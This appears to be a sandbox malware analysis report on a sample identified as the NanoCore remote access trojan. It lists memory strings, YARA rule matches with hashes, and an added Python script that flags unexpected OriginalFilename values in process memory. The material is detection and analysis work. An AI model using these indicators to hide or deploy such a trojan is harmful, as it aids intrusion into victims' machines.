Source: bGf2H3tXGg.exe, 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameLzma#.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 0000000B.00000003.288368251.0000000002B16000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 0000000E.00000002.321173219.0000000005240000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs bGf2H3tXGg.exe
Source: bGf2H3tXGg.exe, 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenameLzma#.dll4 vs bGf2H3tXGg.exe
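The "OriginalFilename ... vs bGf2H3tXGg.exe" lines above are a cheap but effective check: every PE with a version resource carries an OriginalFilename string, so any value in a process's memory that is not the process image itself either belongs to a DLL the loader mapped (ntdll.dll, user32) or to a module that arrived some other way, here the NanoCore plugin assemblies and their dependencies. The script below is an added example, not part of the Joe Sandbox report; it scans a raw memory buffer for the UTF-16LE key, pulls the value that follows, and reports the names that match neither the image nor a supplied list of legitimately loaded modules, which is the step that keeps ntdll.dll and user32 from showing up as findings. The memory buffer and the module list are constructed for the example, and the function names are the example's own.

```python
"""Extract VERSIONINFO OriginalFilename values from raw process memory and
flag the ones that belong neither to the process image nor to a module the
loader brought in.  Added example, not part of the Joe Sandbox report."""

# UTF-16LE form of the StringFileInfo key.  In a real String entry the key
# is NUL-terminated and the value is DWORD-aligned, so the value starts
# either right after the terminator or after one extra NUL pair.
KEY = "OriginalFilename".encode("utf-16-le")
NUL = b"\x00\x00"


def extract_original_filenames(buf):
    """Every OriginalFilename value in buf, in order of appearance.

    Heuristic byte scan rather than a full VS_VERSIONINFO parse: it ignores
    wLength/wValueLength, so it also works on partially overwritten or
    truncated resources, which is the usual state of an unpacked region."""
    found = []
    pos = 0
    while True:
        idx = buf.find(KEY, pos)
        if idx < 0:
            break
        p = idx + len(KEY)
        if buf[p:p + 2] == NUL:          # key terminator
            p += 2
        if buf[p:p + 2] == NUL:          # alignment padding, if present
            p += 2
        end = p
        while end + 2 <= len(buf) and buf[end:end + 2] != NUL:
            end += 2                     # walk UTF-16 code units to the NUL
        try:
            value = buf[p:end].decode("utf-16-le")
        except UnicodeDecodeError:
            value = ""
        if value:
            found.append(value)
        pos = p
    return found


def suspicious_modules(buf, image_name, loaded_modules):
    """OriginalFilename values matching neither the process image nor any
    module in loaded_modules.  Comparison is case-insensitive and ignores a
    .dll suffix, because the resource may store "user32" for user32.dll."""
    def norm(name):
        name = name.lower()
        return name[:-4] if name.endswith(".dll") else name

    expected = {norm(image_name)} | {norm(m) for m in loaded_modules}
    out = []
    for name in extract_original_filenames(buf):
        if norm(name) not in expected and name not in out:
            out.append(name)
    return out


def _string_entry(key, value):
    """Build one VERSIONINFO String entry (wLength, wValueLength, wType,
    szKey, DWORD padding, value) so the sample buffer has the real layout."""
    k = key.encode("utf-16-le") + NUL
    pad = NUL if (6 + len(k)) % 4 else b""
    v = value.encode("utf-16-le") + NUL
    body = k + pad + v
    header = ((6 + len(body)).to_bytes(2, "little")
              + (len(value) + 1).to_bytes(2, "little")
              + (1).to_bytes(2, "little"))
    return header + body


# Constructed memory snapshot: resources from two legitimately loaded system
# modules, some unrelated bytes, and two entries that are only present if
# NanoCore's plugin assemblies were mapped into the process.
SAMPLE_MEMORY = (
    b"\x00" * 16
    + _string_entry("CompanyName", "Microsoft Corporation")
    + _string_entry("OriginalFilename", "ntdll.dll")
    + b"\xcc" * 7
    + _string_entry("OriginalFilename", "NanoCoreBase.dll")
    + _string_entry("OriginalFilename", "user32")
    + _string_entry("OriginalFilename", "ClientPlugin.dll")
    + b"\x00" * 8
)

if __name__ == "__main__":
    print(extract_original_filenames(SAMPLE_MEMORY))
    print(suspicious_modules(SAMPLE_MEMORY, "bGf2H3tXGg.exe",
                             ["ntdll.dll", "user32.dll"]))
```

On a real dump, feed `suspicious_modules` the module list from the sandbox's loaded-module report (or from the PEB's InLoadOrderModuleList if you have the full process memory); anything left over is a module that was mapped without going through the loader, which is exactly the case for the NanoCoreBase.dll and *ClientPlugin.dll values the report lists for this sample.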
Source: bGf2H3tXGg.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339271124.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.323888903.00000000025B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
